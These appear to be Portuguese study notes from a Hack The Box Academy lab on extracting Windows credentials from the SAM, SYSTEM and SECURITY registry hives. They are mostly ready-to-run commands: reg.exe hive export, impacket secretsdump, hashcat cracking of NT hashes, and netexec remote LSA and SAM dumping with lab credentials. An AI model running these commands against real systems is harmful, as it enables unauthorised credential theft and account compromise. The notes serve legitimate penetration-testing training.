Attacking SAM, SYSTEM, and SECURITY

HKLM\SAM

• Contém hashes de senhas para contas de usuários locais.

HKLM\SYSTEM

• Armazena a chave de inicialização do sistema, que é usada para criptografar o banco de dados SAM.

HKLM\SECURITY

• Contém informações confidenciais utilizadas pela Autoridade de Segurança Local (LSA)

• Usando o reg.exe para copiar hives do registro pelo windows

reg.exe save hklm\sam C:\sam.save
reg.exe save hklm\system C:\system.save
reg.exe save hklm\security C:\security.save

• Despejando hashes com secretsdump

python3 /usr/share/doc/python3-impacket/examples/secretsdump.py -sam sam.save -security security.save -system system.save LOCAL

• Executando o Hashcat contra hashes NT

sudo hashcat -m 1000 hashestocrack.txt /usr/share/wordlists/rockyou.txt

• Despejo remoto de segredos LSA

netexec smb 10.129.42.198 --local-auth -u bob -p HTB_@cademy_stdnt! --lsa

• Despejando SAM remotamente

netexec smb 10.129.42.198 --local-auth -u bob -p HTB_@cademy_stdnt! --sam